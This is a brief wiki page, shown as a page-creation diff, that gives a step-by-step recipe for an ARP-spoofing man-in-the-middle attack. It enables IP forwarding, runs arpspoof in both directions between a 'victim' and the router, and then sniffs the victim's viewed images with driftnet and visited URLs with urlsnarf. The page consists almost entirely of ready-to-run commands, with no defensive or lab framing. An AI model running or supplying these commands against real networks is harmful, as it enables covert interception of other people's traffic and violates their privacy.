Changes

Jump to navigation Jump to search
Created page with "= Method 1 = === Enable Packet forwarding === sysctl -w net.ipv4.ip_forward=1 === Intercept packets from victim === arpspoof -i [network interface name] -t [victim IP] [rout..."
= Method 1 =
=== Enable Packet forwarding ===
sysctl -w net.ipv4.ip_forward=1
=== Intercept packets from victim ===
arpspoof -i [network interface name] -t [victim IP] [router IP]
=== Intercept packets from the router ===
arpspoof -i [network interface name] -t [router IP] [victim IP]
=== Sniff images ===
driftnet -i [network interface]
=== Sniff URLs ===
urlsnarf -i [network interface]

Navigation menu